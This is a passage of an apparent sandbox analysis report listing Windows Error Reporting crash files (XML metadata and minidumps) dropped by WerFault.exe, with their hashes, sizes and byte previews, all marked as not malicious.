                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.2.8.<./.P.i.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FA3.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.532236710255688
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYPYm8M4JYwFOH+q8mWKSNp/4SId:uIjfYI7QI7V3JyHeZb4SId
                                                                                                                                                                                                              MD5:D717633F27DA03224BC6D1B2B3B34BEE
                                                                                                                                                                                                              SHA1:F4D3DD023A51434E161611CB717CC310EB4983DC
                                                                                                                                                                                                              SHA-256:9AFB345706FB37EF1892BAED5E53EAA725D67FAA5F0C5DCB01934D2AD0829FD1
                                                                                                                                                                                                              SHA-512:DC2C1C4D01D695B61EFAC53729911AA9AEDC9E23994E14812BD55F0B94EE44516FAB33120C2677CC5F68487F6EC374DE28292D8EABF78FC6EEED86815BF4CB6F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER41E3.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:45 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73752
                                                                                                                                                                                                              Entropy (8bit):1.9715198810424686
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:iBkgVwZczyWgdODH2pjosC1BcHtYW59Bc2F:jgmezyW+OwjolBUYWxJ
                                                                                                                                                                                                              MD5:A5C778B8F11785EEE9B7E3BEE95B5933
                                                                                                                                                                                                              SHA1:9E67553A80569D20792B06F7FAD1B326CC30481C
                                                                                                                                                                                                              SHA-256:2938CC7AC7F405782ED8D810E0AF0974C3D852D427CD264B0EEBC0E4FF2489D6
                                                                                                                                                                                                              SHA-512:DF87E9AC6D256074629ECB7289FFFFEB6D19C10A37BDA88E18C0ADDF898819164B2BDA0E05C9C8DCBE1A9FC0726C65AF1B83E16F34F5A0FBAEF0E2A9BFA62122
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........?2g............$...............,.......$....5..........T.......8...........T............ ..........................................................................................................eJ......D.......GenuineIntel............T............?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER430D.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.707446617213234
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJ2Gkx6Crk6YSNSU9BFgmfYfNprw89b5Psfezm:R6lXJE6Crk6YoSU9BFgmfQ950f7
                                                                                                                                                                                                              MD5:5591EF73493CA226F0406538DCD9DBA3
                                                                                                                                                                                                              SHA1:6E883A7184348CC23027941478E7B2CC885C07F8
                                                                                                                                                                                                              SHA-256:DBBE987EFFDF55A5D9E4569ECCE06BBD90ED20587E804479CD937B432B29FF0B
                                                                                                                                                                                                              SHA-512:067AFB9A227156682CAEF92D1AA36314A5244EA2558625E8F03BC01B730D65AC3350A6043A756C84E78D76AF1CA81BF5B3B61656A74157D35FB98D9D4C0608E5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.3.0.4.<./.P.i.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER434D.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.533154458382149
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYnYm8M4JYwFi1+q8mKzNp/4S5d:uIjfYI7QI7VTJw0b4S5d
                                                                                                                                                                                                              MD5:CE3EA233F2C2D39888D4D6DF78945A5E
                                                                                                                                                                                                              SHA1:90384187F783034EACE620E83720AE3563E358B6
                                                                                                                                                                                                              SHA-256:BBC3B263A4FF3ABCF880890E231B807E48A57780ED420D74EC6518767EC86E2D
                                                                                                                                                                                                              SHA-512:AA3ACA28467197F41EDA0D4799F681FA66199527F3187EA2A6569FAC4376E775FF9508B9A551651631EC2DD8CBDEB366CD6945DDDFB8E362E626B5280160B6FE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5210.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:49 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):72456
                                                                                                                                                                                                              Entropy (8bit):1.9185039912406388
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:FEkgVLcz0/oRgvabmHnHS2neztx1dvZQ:bg+zaoRrmnS2nKrv
                                                                                                                                                                                                              MD5:ED8CC81F7B1051A37AD5DC63F7D7F616
                                                                                                                                                                                                              SHA1:328BA03A130246C40A386CF575BC64412EECCF0E
                                                                                                                                                                                                              SHA-256:848990938D921C2FE0EF4B95AEA0A6E90050C80186F3D63048EA9913B70A524E
                                                                                                                                                                                                              SHA-512:396EA854EB3642AAC2754692341BFE4731E12051956DA442368BB77B31484E7A28966050CA6AF0194E308847B431BF778E080F23250FD0C00A3102733A162915
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........?2g............$...............,............5..........T.......8...........T...........(...........................................................................................................eJ......D.......GenuineIntel............T.......,....?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER532A.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.707966770665889
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJXkk6b6YSYSU9A+gmfYfNprp89bVqsftnm:R6lXJ/6b6YdSU9A+gmfQ2VJfA
                                                                                                                                                                                                              MD5:255F95993C9B689451C3843B0F54FA17
                                                                                                                                                                                                              SHA1:F89C50672BE551C24F1DC71EAF38616529B35B9F
                                                                                                                                                                                                              SHA-256:0DE8117B22D1FC1A98710F32BBF69F23303BEB0E9C0C015E934A1B236D3389FA
                                                                                                                                                                                                              SHA-512:AF6BE94DC6449D77C0917A5C91668544E3A5A4A02B21405DBF950652D70DA1AD333BEC901D72C7901864C9E9E002E16089B463465DD8B0CE5041CB196C789A1D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.2.1.2.<./.P.i.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5389.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.528542831138928
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYLYm8M4JYwF4+q8ms9Np/4SMd:uIjfYI7QI7VfJsE9b4SMd
                                                                                                                                                                                                              MD5:78CFBAD0F0B1166992CD2129C5D8027E
                                                                                                                                                                                                              SHA1:9489B1A4C645E63B4387C075F125CA47CACD4623
                                                                                                                                                                                                              SHA-256:0075837F214D26843737D9EE1A6D281840A75BC7D18912FE4AC712C1394612B2
                                                                                                                                                                                                              SHA-512:10CAE24413216097CCE8B2E36173C7F44ECB58778DF58673126DDDEA35E08409E4B405AE17BDFA2F9576A786D87ED3A69E55DEAA9B8B44CE77DE141E297A37A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5ACA.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:51 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):95210
                                                                                                                                                                                                              Entropy (8bit):1.8201730124315505
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:77ajPpAZcziL/DqRhe6g4h4wxkJ/dbOsdTegKdDAEOQr33wkRa4GyMOn:APp3ziL/DqRhe6hr+ssBaDAE1w4Gy9n
                                                                                                                                                                                                              MD5:6406F53BAE0E86883D2F4EDE0B534C2D
                                                                                                                                                                                                              SHA1:B008C4F5FC3646A68D3B8EBF71E495EB48F21844
                                                                                                                                                                                                              SHA-256:30425580A1E1F03DE3E708862A5DDAE9CB3A6B4A65FCA5AED85EF01012814E1F
                                                                                                                                                                                                              SHA-512:36A01D8DB34C48D110A8E449BB5E001DC835FAD26B190DD8D6770E6C032D1BBE156A44E812A9D90AD498DCE1DAD4738B957401A228B1A709CA2D409A66C04372
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........?2g.........................................>..........T.......8...........T...........0!...R..........P...........<...............................................................................eJ..............GenuineIntel............T.......X....?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C04.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8368
                                                                                                                                                                                                              Entropy (8bit):3.7053111046100695
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJAkR6lgYKe6YSaSUragmfYfNpru89b8psfS0m:R6lXJ3656YfSUragmfQX8CfQ
                                                                                                                                                                                                              MD5:FA67F68598F39BF93EA5DF5782157D40
                                                                                                                                                                                                              SHA1:B3D09A9EF78C39D614A859A755214FC22F61DA7D
                                                                                                                                                                                                              SHA-256:EC49FB3D750827E2FB5F73C378B77807A060758D9C3C827FAAFFAF10C6546093
                                                                                                                                                                                                              SHA-512:6B98AFFC6D776C605AEDB92B429EE28D47B3F2320E4DC0E8668736A345B4EB4D43BD8C8573FAB2B29A88E39695C61218E73D057BC15C351A750978CBAD12DB43
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.4.4.<./.P.i.d.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C63.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4639
                                                                                                                                                                                                              Entropy (8bit):4.532726032548063
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsKJg77aI9+5WpW8VYDYm8M4JYwF5I+q8mN1Np/4S2d:uIjfYI7QI7VHJ2l1b4S2d
                                                                                                                                                                                                              MD5:32F3CC11ADF6F50DDA90A0665EDF0B1A
                                                                                                                                                                                                              SHA1:D9E66DE1ECDB1C6E8FFF7867FDD6A0F0D0707DA2
                                                                                                                                                                                                              SHA-256:14C9B65A3696AC643D3425A85639EED4F7CC7846FDA3F45F1610A1E37A7E87BA
                                                                                                                                                                                                              SHA-512:24FE9E73CD45B29B273B06399FDA7BBBD3D1EBB82006C986D90BD4B7BB14C245C894CE0F05BDC8FB22E2FD6FE161C5576EE969688E3D45E4B08EEB36FC127443
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="583716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER6152.tmp.dmp

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:Mini DuMP crash report, 14 streams, Mon Nov 11 17:33:53 2024, 0x1205a4 type
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73760
                                                                                                                                                                                                              Entropy (8bit):1.8355113429724748
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:QGBXXevXOX1gVPkNbOK8jnqS+rrm9uWe0r5J8kIQ/HGlzFBWlt8ut7:3QkgVsczj1++9uWZP8kIQ/mlzFI8u
                                                                                                                                                                                                              MD5:BE167A8155915BEA479296DC46E9A73C
                                                                                                                                                                                                              SHA1:FA9E620ED11C8770A0F8B08BCF913FBD463A0F9E
                                                                                                                                                                                                              SHA-256:95F4F99A9A433F52D6AD7105E9B611C59C18E9395AB336D13E1C02E9322074A2
                                                                                                                                                                                                              SHA-512:F5E0D7C31CF5A01BA708B239FDA01F2B312827F9310520E1CE002E0B427073C6BAD6D4F9BCFFA575BCB47F0FDF14C9A1F341C54367D23BD67707EEB3B5AE4A35
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:MDMP..a..... ........@2g............$...............,............5..........T.......8...........T...........P...........................................................................................................eJ......D.......GenuineIntel............T.......|....?2g............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER63E4.tmp.WERInternalMetadata.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8372
                                                                                                                                                                                                              Entropy (8bit):3.7091499215383186
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:R6l7wVeJxk36ON6YSrSU/9gmfYfNpru89buZsf0Kam:R6lXJK686YeSU/9gmfQXuyfL
                                                                                                                                                                                                              MD5:86FC051FA472D362EB83526CE0B87E49
                                                                                                                                                                                                              SHA1:C54B114A264F9A23F8CDFCF1CC1C4B95FB46D21F
                                                                                                                                                                                                              SHA-256:135165AFE2A5C4071C20D2BB824D131C77FF8E6B6FDCB3B1CB9E08005B87DD0F
                                                                                                                                                                                                              SHA-512:DC3EABB6B737C62235889173745C040148DB64637EF91C00FD75B6AE5CECEA7BD7B3D209E1E7980334FA3DA0BC4CCF4A94846ED6ED0FF074DB050C73386D404F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.9.6.4.<./.P.i.

                                                                                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WER6442.tmp.xml

                                                                                                                                                                                                              Download File
                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
